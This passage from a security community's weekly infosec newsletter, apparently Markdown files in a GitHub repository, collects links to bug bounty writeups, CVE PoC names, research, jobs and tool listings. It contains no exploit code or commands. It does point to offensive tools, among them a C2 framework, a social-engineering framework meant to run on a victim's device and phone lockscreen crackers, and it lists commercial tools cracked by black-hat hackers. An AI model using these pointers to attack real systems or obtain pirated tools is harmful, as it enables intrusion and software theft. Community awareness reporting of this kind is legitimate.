designs, and best practices for end-users and developers, etc.\n \n  - **Webinars and videos**\n    - How [CIA spies spread dangerous propaganda on YouTube](https://youtu.be/fKNAXLX6pKg)\n    - Podcast [Two CISOs discuss the conviction of ex-Uber CISO](https://open.spotify.com/episode/4NqI0eXvLFlb5Dnxc0PdU7) \n       > Andrew Monaghan had Ben Halpert, the CISO of Groupon, and myself on the Sales Bluebird podcast to talk about what the sentencing could mean for the cybersecurity industry\n    - Swiggy, the 2nd largest food delivery service in India, is [inviting drone companies to partner for warehouse delivery with drones.](https://youtu.be/P58h6sy25WQ)\n    - APIsec University is hosting a live discussion with API security experts from U.S. Bank and WeWork on October 20th at 12pm ET on [The 3 Pillars of API Security: Governance, Testing and Monitoring. 
You can register here.](https://my.demio.com/ref/8SgjSd5ekemBWh5d)\n    \n\n  - **Ongoing/Upcoming 𝙀𝙑𝙀𝙉𝙏𝙎**:   \n \n    - CISO Visions : 17th to 21st October | Virtual – English \n    - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October |  Washington DC \n    - E-crime & Cybersecurity London : 19th October | London, UK \n    - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n    - IT-SA : 25th to 27th October | Nuremberg, DE \n\n</details> \n \n <details> \n <summary><b> 3. Twitter Threads, News, Announcements & Tips 🟢\n </b></summary>   \n \n - Announcement📣 :\n   - CISAgov released [RedEye](https://twitter.com/USCERT_gov/status/1580908416414863366)\n     > An interactive open-source analytic tool developed w/@PNNLab to visualize & report #RedTeam command & control activities. RedEye lets users assess complex data, evaluate mitigation strategies & more: \n   - Researchers say that the [XTREME PENTESTING Telegram group is scamming people by selling Hackthebox Halloween vouchers (Annual VIP+) that are currently free on Hackthebox for 1 month.](https://twitter.com/devil8731/status/1580527828277530624?t=q6soTWAwigM7OYEIIzpmNw&s=19)\n  \n - Threads, Resources, News & Tips:\n  \n   - Greg Linares created a thread discussing [a real world breach involving a drone delivered exploit system that occurred this summer](https://twitter.com/laughing_mantis/status/1579550302172508161)\n   - Froggy is trying to [build an 𝗢𝗽𝗲𝗻-𝘀𝗼𝘂𝗿𝗰𝗲 𝗔𝘁𝘁𝗮𝗰𝗸 𝗦𝘂𝗿𝗳𝗮𝗰𝗲 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 𝗧𝗼𝗼𝗹](https://twitter.com/iamthefrogy/status/1581768423649837056)\n   - @Shreky shared threads to learn \n     > IDOR (Insecure Direct Object Reference) : [how to test for IDORs step by step on real #bugbounty programs.](https://twitter.com/shrekysec/status/1580890598542045186)\n  \n     > XSS (Cross Site Scripting) -> [how to test for #XSS step by step on real #bugbounty programs.](https://twitter.com/shrekysec/status/1577764184137338901)\n   - [30 cybersecurity search engines for 
researchers](https://twitter.com/danielmakelley/status/1581774745791385600) by Daniel Kelley\n\n   \n</details>  \n \n<details> \n<summary><b> 4. Update on Data breaches & Black Hat hacker leaks 🔴 \n</b></summary> \n   \n - 🔴 **Update - Paid Tools** that have been leaked or cracked by Black Hat hackers : \n      > Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1, Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense 3.1.2.0 (x32/x64) Licensed, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **Update - Black Hat hacker leaks & activity** : \n     - Mango Markets to pay $47 million to the hacker and drop criminal prosecution; the hack was the sixth-largest DeFi exploit in history, trailing the $130 million Cream Finance hack.\n       > The community of the DeFi platform Mango Markets voted in favor of the agreement with the hacker. He will return the $69 million and keep the remaining $49 million as a reward. Recall that earlier Mango's credit protocol on Solana was hacked. 
According to preliminary estimates, the hacker managed to get more than $100 million.\n     - The source code of Intel Alder Lake processors has appeared on the web, posted by Kingsman.\n\n     - On 12th October, a tweet from @IANS claimed that\n        > Cybersecurity researchers said they have discovered a massive leak involving over nine million cardholders' financial data that includes customers of the State Bank of India (#SBI).\n     - We have verified the Indian government and military defence data mega leak \n        > Includes all kinds of top secret, secret and confidential documents from the following sectors: ALISDA, DGAQA, MSQAA, DRDO, DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n     - Conti source code for v3.7.7 and ransomware builder tools have been circulated around private groups, and the Taurus bot source code has been leaked. \n \n</details> \n \n<details> \n<summary><b>\n5. Hiring/Jobs\n</b></summary>\n \n> In this beginner-friendly segment, we talk about and share the latest resources related to jobs this month, interview questions and free training offered by organizations, communities and leaders.\n \n - 1. Take a look at [Internship/Job Openings in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker has collected [Interview Questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n \n</details> \n</details> \n\n<span id=\"title-bb\"></span>\n<details> \n<summary><b> 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞  \n \n > Everything related to Bug Bounty : reports, writeups and resources👇\n </b></summary>   \n\n <details> \n <summary><b>1. Hackerone/Bugcrowd reports worth reading for Bug Hunters. </b></summary>\n \n *1. 
In This Segment, we have filtered out Top **HACKERONE/BUGCROWD REPORTS** for Bug Hunters :*\n   - 🐞 $33,510 on Gitlab for [Remote Command Execution via Github import](https://hackerone.com/reports/1679624)\n   </details> \n \n<details> \n<summary><b>2.  BUG BOUNTY : writeups, tips & resources. </b></summary>\n \n *2. In this beginner-friendly segment, we collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n  - **Writeups** :\n    - [The Ultimate Guide to Finding Bugs With Nuclei by projectdiscovery](https://blog.projectdiscovery.io/ultimate-nuclei-guide/)\n    - [CSP and Bypasses](https://www.cobalt.io/blog/csp-and-bypasses)\n       > This blog post aims to demonstrate what CSP is, why CSP is implemented, and how attackers can bypass CSP. In this article, I will include how you can bypass some directives to achieve XSS on the target application.\n    \n    - [Facebook SMS Captcha Was Vulnerable to CSRF Attack](https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980)\n        > This post is about a bug that @lokesh found on Meta (aka Facebook) which allows making any endpoint a POST request in the SMS Captcha flow.\n    - An Instagram [Blind Insecure Direct Object Reference (IDOR) Leads To Export Other User's Data](https://nobugescapes.com/blog/blind-insecure-direct-object-reference-idor-leads-to-export-other-users-data/)\n    - [Sajan Bhujel's blog about \"How I Got $10,000 From GitHub For Bypassing Filtration of HTML tags\". 
@GitHubSecurity](https://saajanbhujel.medium.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37)\n    - [What I learnt from reading 220 IDOR bug reports.](https://medium.com/@nynan/what-i-learnt-from-reading-220-idor-bug-reports-6efbea44db7)\n    - [Full Company Building Takeover](https://omar0x01.medium.com/company-building-takeover-10a422385390)\n   \n - **New Resources Found + Non-Technical**\n    - [Cyber Security Career Pathways](https://blog.marcolancini.it/2022/blog-cyber-security-career-pathways/) \n      > Marco Lancini shows his concern over organizations trying to sell their certifications and drafted a mindmap as a first attempt at grouping roles into macro-functions commonly found in tech companies.\n    - [Which part of the security community are you in?](https://www.philvenables.com/post/field-guide-to-the-various-communities-of-security)\n      > Field Guide to the Various Communities of Security\n    - [How to get a Cyber Security Job at Google](https://pentestingguide.com/how-to-get-google-cyber-security-jobs/)\n      > If you want to become a hacker, bug bounty hunter or cyber security analyst and your dream job is at Google, Microsoft or Facebook, then this article is really going to help you.\n    - [𝐎𝐒𝐂𝐏 𝐏𝐫𝐞-𝐏𝐫𝐞𝐩𝐚𝐫𝐚𝐭𝐢𝐨𝐧 𝐏𝐥𝐚𝐧 𝐚𝐧𝐝 𝐍𝐨𝐭𝐞𝐬](https://github.com/shreyaschavhan/oscp-pre-preparation-plan-and-notes)\n    - [Cool Job : I (@Arl_rose) Recruit Pentesters for HackerOne](https://www.codecademy.com/resources/blog/cool-coding-job-hackerone-pentesting-community/)\n    - [What does it mean to become an Intigriti partner](https://blog.intigriti.com/2022/10/04/become-intigriti-partner/)\n\n </details> \n \n <details> \n<summary><b>3. 
Bug Bounty HELPDESK by ResetHacker Community.</b></summary>\n \n   - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n   - [Bug bounty Setup & hacker daily utility](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n   - [Bug Bounty Resources, recon methodology, wordlists, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n \n</details> \n\n</details> \n \n  <span id=\"title-tools\"></span>\n<details> \n<summary><b> 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️  \n \n > List of tools that satisfy the hacker purpose in every domain.👇\n </b></summary> \n\n> Community members test the tools and we filter out the most in-demand and helpful tools that satisfy the hacker purpose in different domains.\n\n<details>\n<summary><b>1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 6 Tools</b></summary>\n  \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n    \n    - [Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.](https://github.com/ergrelet/cpplumber)\n    - [Ghauri](https://github.com/r0oth3x49/ghauri)\n      > An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws\n    - [XSLeaker](https://github.com/Philesiv/XSLeaker)\n      > XSLeaker is a tool that helps to find XS-Leaks (https://xsleaks.dev/) on websites. The tool compares resource values for which a leak technique is known (e.g. number of iframes) between different states.\n    - [Nuclei Template Generator Burp Plugin](https://github.com/projectdiscovery/nuclei-burp-plugin)\n    - [spk aka spritzgebaeck](https://github.com/dhn/spk)\n       > A small OSINT/Recon tool to find CIDRs that belong to a specific organization.\n \n </details>\n \n<details>\n<summary><b>2. Cloud Security - 3 Tools </b></summary>\n \n - **2. 
Cloud Security** - 3\n     - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n     - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. \n        > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n </details> \n\n<details>\n<summary><b>3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools </b></summary>\n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n     - [RedEye is a visual analytic tool supporting Red & Blue Team operations](https://github.com/cisagov/RedEye/)\n     - [The Soaring Eagle C2](https://github.com/ItsCyberAli/The-Soaring-Eagle)\n       > This tool is for whoever wants to learn the basics regarding C2 and malware development; it is not intended to be used in real-world scenarios and engagements (you will get caught, guaranteed). I developed it for learning, not evasion. \n     \n     - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n        > It is an Aggressor Script that turns the headless aggressor client into a (mostly) functional Cobalt Strike client. \n\n     - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n        > varc collects a snapshot of volatile data from a system. 
It tells you what is happening on a system, and is of particular use when investigating a security incident.\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n        > Predicts the probability of an exploit being released after a CVE is published (using a machine learning algorithm); the project is based on the [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n</details> \n\n<details>\n<summary><b>4. Reverse Engineering, Encryption & OSINT - 5 Tools </b></summary> \n \n - **4. Reverse Engineering & OSINT Tools** - 7\n     - [NoRunPI: Run Your Payload Without Running Your Payload](https://github.com/ORCx41/NoRunPI)\n     - [osintui: Open Source Intelligence Terminal User Interface](https://github.com/wssheldon/osintui)\n     - [SteaLinG v0.3](https://github.com/De3vil/SteaLinG)\n        > SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.\n     - A simple [(almost) POSIX shell script for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n     - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n        > Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n     - [uosint](https://github.com/uosint-project/uosint) -> Find the profiles of a person on social networks.  \n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) \n        > A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once.\n\n </details> \n\n<details>\n<summary><b>5. IoT, OS & Hardware - 3</b></summary>   \n \n  - **5. 
IoT, OS & Hardware** - 4\n      \n      - [Open Athena](https://github.com/mkrupczak3/OpenAthena) \n         > It is a project which allows consumer and professional drones to spot precise locations through their images. This is accomplished by combining their sensor metadata (https://github.com/mkrupczak3/OpenAthena/blob/main/drone_sensor_data_blurb.md) with an offline-ready Digital Elevation Model (https://github.com/mkrupczak3/OpenAthena/blob/main/EIO_fetch_geotiff_example.md) to provide the instant location of what is being observed.\n\n      - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack interface lockscreen, Metasploit and more Android/iOS hacking.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n         > Set of tools for security testing of Internet of Things devices using specific IoT network protocols.\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n         > Drone Hacking Tool is a GUI tool that works with a USB WiFi adapter and HackRF One for hacking drones.\n\n </details> \n</details> \n\n---\n  \n<details>\n<summary> 🤝🤝🤝 Team/Contributors and Community Engagement partners and resources that help in drafting the Weekly Infosec Update.🤝🤝🤝 </summary>\n\n> Huge thanks to our awesome [Community Leaders for contributing and giving back to the community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md), and thank you for being part of the team.\n   - Contributors : Good Resources Share, Paul Miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [organizations, groups, and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). 
Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n </details>\n \n ---\n\n#### Wrapping Up\n <div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=RESETHACKER Community:\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\nHave questions, Suggestions, feedback or want to contribute? Just reply directly to mail (resethackeroffical@gmail.com), I'd love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading!\n \n  \n<p align=\"\"><img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md",
    "content": "#### Hey Hackers, I hope you have all enjoyed your Diwali celebrations!! \n > Here is the agenda for *Weekly infosec Update v0.7* : **19th October- 25th October 2022**\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\n**Tips to SAVE TIME & How to READ this Newsletter?**\n- Select the topic from the **Navbar** below and click on **Summary/Preview** and **Arrow (>)** to see the Details:\n\n- Open all relevant Titles in a New Tab (Ctrl+Click), then READ them one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n<span id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n**Every week our team filters out the latest IT security CVE POCs, updates on patched security, and writeups & analysis of CVEs that have been discovered, written or found by community members. 
Format we follow**:\n\n### Week -> [**19th October- 25th October 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)👈.\n\n <summary>\n Security patched within a week: \n \n   > We have tracked the latest security advisories of top vendors and filtered out the high and critical vulnerabilities that have been patched.\n   > This week, we have updates from Mozilla, Microsoft, Jenkins, GitHub, Cisco, Linux (Ubuntu 22.4, 20.4 & 18.4 LTS) & CISA advisories.\n</summary>\n\n<summary>\n CVE Analysis, writeups and reports \n \n   > (A total of 6 CVEs this week)\n \n   > This week, we have collected the recently discovered write-ups for CVEs that have critical or higher severity. \n</summary>\n\n <summary> \n  PoC for CVE & exploit \n \n   > (A total of 12 new 0-days this week) :\n \n   > Every week, we track the recently discovered exploits and PoCs for CVEs.  \n</summary>\n\n<details>\n<summary><b>Summary/Preview</b></summary>\n \n > Week -> [**19th October- 25th October 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) 👈.\n\n \n      CVE:ANALYSIS & POC:          CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n \n                                   CVE-2022-3236 & CVE-2022-36966. 
\n\n         \n      CVE POC (0-Day):             7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,\n \n                                   CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422 (Google Chrome).\n \n\n</details> \n\n---\n\n<span id=\"title-research\"></span>\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n   > In this segment, we have collected the latest and most relevant articles/whitepapers/research/techniques/resources from all the infosec domains for independent researchers and professionals who want to stay up to date with the latest security developments, are looking for a new approach to find CVEs/bugs, or want to track the infosec market and startups. \n<details> \n<summary><b>1 - Infosec Business, Funding and Market</b></summary> \n \n - **1 - Infosec Business, Funding and Market** \n \n     - [Top cybersecurity trends for 2023](https://www.spiceworks.com/it-security/cyber-risk-management/guest-article/the-top-cybersecurity-trends/) \n       > Where Taylor Hersom mentions multiple reports, covering Q1 2022 results from cyberattacks, Persistent Phishing, The Digital Supply Chain Problem, and The Cybersecurity Mesh and Distributed Approach.\n\n   - What Does It Mean To [‘Invest In Cybersecurity’ In 2022 And Beyond?](https://www.forbes.com/sites/theyec/2022/10/19/what-does-it-mean-to-invest-in-cybersecurity-in-2022-and-beyond/?sh=571ea1b51eb5)\n\n   - [A comparison of cybersecurity regulations](https://law.asia/comparison-cybersecurity-regulations/)\n\n   - Gartner Survey Finds [88% of Boards of Directors View Cybersecurity as a Business Risk](https://www.gartner.com/en/newsroom/press-releases/2022-10-19-gartner-says-89-percent-of-board-directors-say-digital-is-embedded-in-all-business-growth-strategies)\n    \n  - **Infosec Market Helpdesk**  \n \n     - The Cybersecurity Market Size is Expected to Hit US$266.2 
Billion by 2027, reflecting a constant-currency compound annual growth rate of 11% from 2021.\n \n     - The global cybersecurity workforce gap has increased by 26.2% compared to 2021, with 3.4 million more workers needed to secure assets effectively, according to the [(ISC)2 2022 Cybersecurity Workforce Study](https://www.isc2.org//-/media/ISC2/Research/2022-WorkForce-Study/ISC2-Cybersecurity-Workforce-Study.ashx)\n        > This represents a stark increase in the shortage of cybersecurity professionals compared to 2021, which stood at 2.72 million. The research surveyed 11,779 individuals responsible for cybersecurity.\n \n     - [Report from ReportLinker](https://www.reportlinker.com/p06352700/Global-Artificial-Intelligence-In-Cybersecurity-Market-Size-Share-Industry-Trends-Analysis-Report-By-Offering-By-Vertical-By-Application-By-Type-By-Technology-By-Regional-Outlook-and-Forecast-.html) \n       > The Global Artificial Intelligence In Cybersecurity Market size is expected to reach $57.1 billion by 2028, rising at a market growth of 24.5% CAGR during the forecast period.\n       \n     - This research shares insight into the [Indian market and its clients, and helps you understand who is the right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing)  \n \n     - Investors and venture capital (VC) for cybersecurity STARTUPS :  [Liberty City Ventures](https://www.libertycityventures.com/),  [Evolution Equity](https://evolutionequity.com/),  [M12VC](https://m12.vc/),  [Team8.VC](https://team8.vc/),  [Centerstone Capital](https://www.centerstone.capital/),  [Insight partners](https://www.insightpartners.com/),  [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/)  etc.\n      \n  </details>\n  \n<details>\n<summary><b> 2. 
Research/Articles discussed by professionals or independent researchers </b></summary>\n   \n - **1 - Web Security and Android Security**\n \n     - [Analysis of thousands of active API tokens leaked via public package repositories](https://jfrog.com/blog/jas-secrets-detection-reveals-active-tokens/)\n     - [Bringing Modern Authentication APIs (FIDO2 WebAuthn, Passkeys) to Linux Desktop](https://github.com/AlfioEmanueleFresta/xdg-credentials-portal)\n     - [HTTP/3 connection contamination: an upcoming threat](https://portswigger.net/research/http-3-connection-contamination)\n     - RPC Toolkit - [security research oriented resources on MS-RPC (articles, PoCs, vulnerability write-ups, tools, etc.)](https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit)\n     - postMessage Braindump - [a brief postMessage testing methodology](https://rhynorater.github.io/postMessage-Braindump)\n     - [Userland Execution of Binaries Directly from Python](https://www.anvilsecure.com/blog/userland-execution-of-binaries-directly-from-python.html)\n     - In a nutshell: [data protection, privacy and cybersecurity in India](https://www.lexology.com/library/detail.aspx?g=b06b310c-76d0-4625-8b21-b0dba79bdf52)\n     - SANS released a survey: [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n\n\n - **2 - Cloud Security & Automation**\n     - [Kubernetes CRD validation with CEL and kubebuilder marker comments](https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments)\n     - [How an Attacker Can Achieve Persistence in Google Cloud Platform (GCP) with Cloud Shell](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)\n     - [October : Google Cloud Latest News & Updates](https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud)\n  \n - **3 
- Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team** \n     - [Verizon 2022 Data Breach Investigations Report (DBIR)](https://www.verizon.com/business/resources/reports/dbir/2022/master-guide/)\n     - [How to Investigate Insider Threats (Forensic Methodology)](https://www.inversecos.com/2022/10/how-to-investigate-insider-threats.html) \n     - [How a Microsoft blunder opened millions of PCs to potent malware attacks](https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/)\n     - [Microsoft Defender adds command and control traffic detection](https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-adds-command-and-control-traffic-detection/)\n     - [Microsoft Office 365 Message Encryption Insecure Mode of Operation](https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation)\n     - [#StopRansomware: Daixin Team](https://www.cisa.gov/uscert/ncas/alerts/aa22-294a)\n     \n   - **Red Team**\n     - [Environment configuration for Red Team Cyber Security testing and tasks](https://github.com/zackjmccann/red-team-security)\n     - [Genshin Impact Art Stolen Via AI, Thief Claims To Be Artist](https://kotaku.com/genshin-impact-fanart-ai-generated-stolen-twitch-1849655704)\n     - A Detailed [Analysis of the Gafgyt Malware Targeting IoT Devices](https://securityscorecard.pathfactory.com/all/gafgyt-iot-devices)\n     - Reverse Engineering the [Apple MultiPeer Connectivity Framework](https://www.evilsocket.net/2022/10/20/Reverse-Engineering-the-Apple-MultiPeer-Connectivity-Framework/)\n     - [Transform P3 P4 P5 vulnerabilities to P1](https://www.acceis.fr/transform-p3-p4-p5-vulnerabilities-to-p1/) \n         > Article by ACCEIS explaining how to steal user sessions by chaining low-risk vulnerabilities.\n     - [Hidden DNS resolvers and how to compromise a fully-patched WordPress 
instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n \n  - **4. HelpDesk**\n     - [Pentesting HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/Readme.md) by the ResetHacker Community\n     - A list of [Privacy & Security Resources](https://docs.hackliberty.org/books/privacy-security/page/privacy-security-resources) \n    \n</details>\n\n---\n<span id=\"title-beginners\"></span>\n### Friendly Segment\n   > We have tried to solve the problem \"How to stay up to date with the latest Bug Bounty community without wasting time on social media\". This segment is a friend to intermediate bug hunters and ethical hackers, while the NEWS and TOOLS segments are common to professionals and intermediates.\n  <details> \n  <summary><b>\n📰📰📰 Hackers NEWS 📰📰📰  \n   \n   > Based on hacker requirements, we have reset infosec news into 5 different segments👇\n   </b></summary>   \n\n  <details> \n  <summary><b> 1. Top 6 infosec News</b></summary> \n   \n   - WhatsApp was down for almost a couple of hours. 
The glitch led to 30,000+ users reporting issues with sending and receiving texts on the WhatsApp application.\n   - BlueBleed: Microsoft confirmed a data leak exposing customers’ info\n     > The IT security researchers at SOCRadar have identified a treasure trove of data belonging to the technology giant Microsoft that was exposed online, thanks to a database misconfiguration. The researchers have dubbed the incident “BlueBleed.”\n   - Forbes, in a blog post, said [Cybersecurity Must Become A Top Priority In Healthcare](https://www.forbes.com/sites/saibala/2022/10/24/cybersecurity-must-become-a-top-priority-in-healthcare/?sh=40d6b2b23b57)\n   - After the [USA](https://drive.google.com/file/d/1FdPbmXiQBuWz7hXM3h3S3Ubb09vZgrHK/view?usp=sharing), the UK has now released its yearly [National Security Strategy](https://drive.google.com/file/d/1Cv9FsRcy3ar-4NX3Hp3e9C1kPW30oMBg/view?usp=sharing)\n      > It talks about the plans, allies and partners of the UK in every region of the world.\n   - Cybersecurity Startup Snyk Lays Off 198 Workers.\n   - More than 7 in 10 cybersecurity incident responders in India say they have experienced extreme or considerable mental strain as a result of responding to a major hacking incident, reveals an IBM study. \n               \n</details> \n \n<details> \n<summary><b> 2. Event recap </b></summary>\n \n   > This week Hexacon 2022, mWISE 2022 and BountyCon slides were mainly trending among the community, and we have collected publicly available important talks, slides, tools, podcasts, videos and upcoming events related to conferences, talks & webinars so you don't miss them and can watch them at a time that suits you.\n\n - **Conferences**\n \n   - Hexacon 2022 : PDF\n      - I feel a draft. 
Opening the doors and windows: [0-click RCE on the Tesla Model 3](https://www.synacktiv.com/sites/default/files/2022-10/tesla_hexacon.pdf)\n      - Hara-Kirin: [Dissecting the Privileged Components of Huawei Mobile Devices](https://www.hexacon.fr/slides/22-Hexacon-Hara-Kirin_Dissecting_the_Privileged_Components_of_Huawei_Mobile_Devices.pdf)\n      - AirbusSecLab: [Security Deep-Dive Into The Internals Of NetBackup](https://airbus-seclab.github.io/netbackup/Hexacon2022-The_unavoidable_pain_of_backups_security_deep-dive_into_the_internals_of_NetBackup.pdf)\n      - Toner Deaf: [Printing your next persistence](https://research.nccgroup.com/2022/10/17/toner-deaf-printing-your-next-persistence-hexacon-2022/)\n      - [Hacking the Cloud With SAML](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG-ZZdMXn/view?usp=drivesdk)\n      \n   -  Mandiant [mWISE 2022 highlights supply chain risk and mental health](https://securitybrief.asia/story/exclusive-mwise-2022-highlights-supply-chain-risk-and-mental-health) \n       > Recap of the mWISE Cybersecurity Conference 2022 (previously the Cyber Defense Summit) : 18th-20th October | Washington DC \n       > Meta [iOS Hacking talk from BountyCon by @phwd_](https://docs.google.com/presentation/d/1PPsyLhTxMAk1IyIp6p5ls0dhnqm3xVQKb8rE9z-N548/)\n \n  - **Webinars and videos**\n    - Cybersecurity [public speaking techniques | Guest Lisa Tetrault](https://youtu.be/E6EfJyFjvDc)    \n\n  - **Ongoing/Upcoming**:   \n  \n    - IT-SA : 25th to 27th October | Nuremberg, DE \n\n</details> \n \n <details> \n <summary><b> 3. 
